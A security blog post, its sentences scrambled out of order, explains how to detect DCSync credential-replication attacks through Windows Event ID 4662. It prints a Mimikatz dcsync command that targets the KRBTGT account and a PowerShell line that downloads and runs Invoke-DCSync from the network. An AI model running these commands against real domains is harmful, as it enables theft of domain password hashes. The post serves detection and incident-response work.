![]() The standard method to detect DCsync activities from event log analysis is to analyze EventID 4662 event where the Object Server is "DS" and the properties contain "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" (DS-Replication-Get-Changes-All) and "19195a5b-6da0-11d0-afd3-00c04fd930c9" (Domain-DNS class WRITE_DAC) but the associated account name is not a machine account (this is most commonly filtered by looking for account names that do not end with "$") In the case of a DCSync command, the adversary leverages the DS-Replication-Get-changes-All extended right within the Domain-DNS class to request data to replicate to a user or system that is not a domain controller so that they can carry out their evil deeds. On domain controllers, Event ID 4662 is logged when an operation is performed on an object within Active Directory and this event is perfectly normal for when objects are changed or when domain controllers need to replicate changes to other domain controllers. If you do some Googling on DCSync detections, you will likely come across a Windows Event Log detection focusing on the Event ID 4662 and this is the one I wanna talk about today. I'd link you right to the repo but I also don't want to get anyone in trouble for clicking a link with the word "mimikatz" in it :) Note: In my research, network based detections continue to be the best way to detect DCSync given that you can key in on a specific protocol but that kind of data hasn't been available during most of the IRs I have been involved with.įor more information regarding DCsync and Mimikatz, I recommend visiting Benjamin Delpy's Blog () and GitHub. In this example, the target account would be the KRBTGT account which is used to encrypt and sign Kerberos tickets within a domain.ĭCSYNC leverages the MS-DRSR protocol via the DSGetNCChanges method which is responsible for replicating Naming Context updates. Powershell -exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('') Invoke-DCSync -PWDumpFormat" ![]() By default domain controllers, domain administrators, and enterprise administrators have these privileges granted.Īn adversary who compromised an account with adequate permissions would load Mimikatz and run a DCSync command like this: lsadump::dcsync /domain:dc.dwyer.local /user:krbtgt To be executed, the adversary must have access to a domain resource with domain replication privileges specifically "Replicating Directory Changes", "Replicating Directory Changes All", and (sometimes) "Replicating Directory Changes In Filtered Set". ![]() "DCSync" allows an adversary to masquerade as a domain controller and remotely retrieve password hashes from other domain controllers without executing any code on the target domain controller. ![]() If you aren't familiar with DCSync, it was implemented into Mimikatz (authored by Benjamin Delpy and Vincent Le Toux) back in 2015. One of the cooler parts of my job is analyzing adversary activity from incident response engagements to better understand how adversaries carry out their operations, identify trends, and create detections to identify malicious activity either before, during, or after an incident. ![]()
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |